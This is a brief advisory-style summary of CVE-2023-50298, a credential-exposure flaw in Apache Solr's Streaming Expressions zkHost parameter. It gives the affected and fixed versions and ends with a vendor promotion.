CVE-2023-50298

Summary

CVE-2023-50298 is a vulnerability affecting Apache Solr versions 6.0.0 through 8.11.2, and 9.0.0 before 9.4.1. It allows unauthorized actors to gain access to sensitive information through a misconfiguration in the Solr Streaming Expressions feature. By setting up a rogue ZooKeeper server and providing it as the "zkHost" parameter in a streaming expression, an attacker can intercept ZooKeeper credentials and access control lists (ACLs), exposing sensitive information. Users are advised to upgrade to version 8.11.3 or 9.4.1 to mitigate this issue, as these versions restrict the use of ZooKeeper credentials and ACLs only to "zkHost" values with the same server address.

Prevent cyber attacks with Recorded Future by prioritizing and patching critical vulnerabilities being exploited by threat actors targeting your industry. Book your demo to learn more.